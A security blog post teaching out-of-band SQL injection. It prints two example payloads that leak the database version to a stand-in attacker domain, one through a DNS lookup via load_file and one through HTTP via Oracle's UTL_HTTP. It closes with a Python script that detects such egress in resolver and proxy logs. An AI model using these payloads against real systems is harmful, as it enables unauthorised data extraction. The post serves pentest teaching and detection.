Week 38 - Out of Band SQLi
Since last week we covered second-order SQL injection, I wanted to make this week’s post on a similar technique: Out-of-Band SQLi.
If you’ve been following my weekly posts then you should already be plenty familiar with SQL injection, but what the heck does Out-of-Band mean?
Out-of-Band means the payload's result comes back over a different channel from the one the payload was sent on. The two channels most commonly used to retrieve the result are DNS and HTTP.
Retrieving the payload result through DNS would look like the following SQL injection:
vulnerable[.]com/test[.]php?id=1+UNION+SELECT+load_file(CONCAT("\\\\",(SELECT+@@version),".attacker[.]com\\test"))
Since CONCAT joins its arguments into one string (and the escaped backslashes collapse to single ones), this injection makes the back-end database try to read the following UNC path, a Windows network share name rather than a URL:
\\10.3.16-MariaDB[.]attacker[.]com\test
So if we have a listener running on our attacker server, we can wait for the incoming DNS request for that hostname and read the result straight out of its labels! This only works when the database server runs on Windows (on Linux the path is just a file name and no lookup happens) and the database user holds the FILE privilege with secure_file_priv not restricting load_file; on the defender's side, a database host resolving an unexpected external name with version-like labels is the signal to alert on.
Now, as mentioned before, we can also exfiltrate over HTTP. This is typically used when the back-end database is Oracle, because Oracle supports the UTL_HTTP.REQUEST function:
vulnerable[.]com/test[.]php?id=1+UNION+SELECT+UTL_HTTP.request('http[:]//attacker[.]com/?version='||(SELECT+version+FROM+v$instance))+FROM+dual
This will issue an HTTP request to the following URL:
http[:]//attacker[.]com/?version=18.0.0.0.0
And we can just listen for incoming HTTP connections! On Oracle 11g and later this needs the database user to have EXECUTE on UTL_HTTP and a network ACL that allows the outbound connection, which is exactly the control a defender should verify is locked down. This technique can be an exotic way of bypassing WAFs or exploiting a tricky injection. Worth adding to your pentest arsenal!
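As an added defender-side example (not code from the original post), both channels described above leave a signature where they can be watched: database hosts resolving names whose subdomain labels carry version-like data, or issuing outbound HTTP requests with query strings. This Python script runs that check over constructed sample resolver and egress-proxy log lines; the database host addresses, the allowlist and the log formats are assumptions.

```python
import re

# Hosts assumed (for this constructed example) to be database servers; they
# have no business resolving arbitrary external names or making outbound
# HTTP requests that carry a query string.
DB_HOSTS = {"10.0.0.5", "10.0.0.6"}
# Domains the database tier is expected to talk to (assumed allowlist).
ALLOWED_DOMAINS = {"vendor.example", "internal.example"}

# Constructed sample logs (not from the original post).
# Resolver query log: "<client> query <name>"; egress proxy log: "<client> <method> <url>".
DNS_LOG = """\
10.0.0.5 query 10.3.16-MariaDB.attacker.example
10.0.0.9 query www.example.com
10.0.0.6 query updates.vendor.example
10.0.0.5 query 5.7.44-log.attacker.example
"""
HTTP_LOG = """\
10.0.0.6 GET http://attacker.example/?version=18.0.0.0.0
10.0.0.9 GET http://www.example.com/index.html
10.0.0.6 GET http://updates.vendor.example/patch.zip
"""

# A subdomain prefix that carries a value rather than a hostname: a dotted
# version (10.3.16 is split into three labels, so the joined prefix is checked),
# a dash-joined build tag such as 16-MariaDB, or a long opaque label.
DATA_LIKE = re.compile(r"\d+\.\d+\.\d+|\d+-[A-Za-z]+|[A-Za-z0-9]{24,}")

def registrable(name):
    """Split a name into (last two labels, everything before them); no public-suffix handling."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def flag_dns(log):
    """Return (client, name) for DB-host queries to non-allowlisted names with data-like prefixes."""
    hits = []
    for line in log.splitlines():
        client, _, name = line.split(" ", 2)
        domain, prefix = registrable(name)
        if client in DB_HOSTS and domain not in ALLOWED_DOMAINS and DATA_LIKE.search(prefix):
            hits.append((client, name))
    return hits

def flag_http(log):
    """Return (client, url) for DB-host requests to non-allowlisted hosts or with a query string."""
    hits = []
    for line in log.splitlines():
        client, _, url = line.split(" ", 2)
        domain, _ = registrable(url.split("/")[2])
        if client in DB_HOSTS and (domain not in ALLOWED_DOMAINS or "?" in url):
            hits.append((client, url))
    return hits
```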